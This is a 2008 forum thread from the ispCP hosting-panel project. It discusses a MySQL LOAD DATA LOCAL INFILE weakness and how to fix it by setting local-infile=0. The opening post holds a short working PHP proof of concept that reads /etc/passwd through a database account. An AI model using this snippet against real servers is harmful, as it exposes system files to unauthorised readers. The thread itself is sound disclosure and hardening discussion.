Current time: 11-23-2024, 12:10 PM Hello There, Guest! (LoginRegister)


Post Reply 
exploit
Author Message
sci2tech Away
Senior Member
****

Posts: 1,285
Joined: Jan 2007
Reputation: 23
Post: #1
exploit
Well known, old, not generated by ispcp but affect it.
Code:
<?php
$link = mysql_connect('localhost', 'sqluser1', 'sqluser1');
mysql_select_db('bla');
mysql_query("CREATE TABLE a (a varchar(1024))");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a");
$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print "$row\n";
mysql_query("DROP TABLE `a`");
?>
To get rid of this, you need to add in my.cnf in section [mysqld]
Quote:set-variable=local-infile=0
Maybe this should be implement as a security feature in ispcp
07-16-2008 09:06 PM
Visit this user's website Find all posts by this user Quote this message in a reply
aseques Offline
Member
*****
Dev Team

Posts: 330
Joined: May 2008
Reputation: 4
Post: #2
RE: exploit
The issue it's quite grave, even tought you can not get /etc/shadow, you can get lots of sensitive information if mysql is not chrootted (in ispcp it isn't)
In the case of Plesk, they set the value to 0 too.
07-22-2008 12:19 AM
Find all posts by this user Quote this message in a reply
ephigenie Offline
Project Leader
*******
Administrators

Posts: 1,578
Joined: Oct 2006
Reputation: 15
Post: #3
RE: exploit
mh.

yeah we'll see that we test if the value is present and if not append it in the [mysqld] section. lets see how we can do that.

But after all it should be clear that this kind of information gathering is only possible if the attackers has a valid mysql account - or has found a method to inject malicious code into installed php applications (i.e. phpbb 2.x and so on are good candidates for such things )
(This post was last modified: 07-22-2008 12:27 AM by ephigenie.)
07-22-2008 12:23 AM
Visit this user's website Find all posts by this user Quote this message in a reply
aseques Offline
Member
*****
Dev Team

Posts: 330
Joined: May 2008
Reputation: 4
Post: #4
RE: exploit
In /etc/mysql/my.cnf, you can read
Code:
....................
#
# * IMPORTANT: Additional settings that can override those from this file!
#
!includedir /etc/mysql/conf.d/

So, you could probably create an /etc/mysql/conf.d/ispcp with the customized settings...
07-22-2008 12:29 AM
Find all posts by this user Quote this message in a reply
ephigenie Offline
Project Leader
*******
Administrators

Posts: 1,578
Joined: Oct 2006
Reputation: 15
Post: #5
RE: exploit
yeah this is a good point ... (lets see how this works out)
07-22-2008 12:31 AM
Visit this user's website Find all posts by this user Quote this message in a reply
FeG Offline
Banned

Posts: 222
Joined: Aug 2007
Post: #6
RE: exploit
Hi,

I'd suppose to create a file in /etc/mysql/conf.d named i.e. exploit-fix.cnf with the following content:
Code:
# Fixing http://www.isp-control.net/forum/exploit-t-3772.html
[mysqld]
set-variable=local-infile=0

until this is fixed officially by an ispCP config file.
You'll have to restart mysql thereafter:
Code:
/etc/init.d/mysql restart

Greetings
FeG
07-24-2008 07:08 AM
Find all posts by this user Quote this message in a reply
Post Reply 


Forum Jump:


User(s) browsing this thread: 1 Guest(s)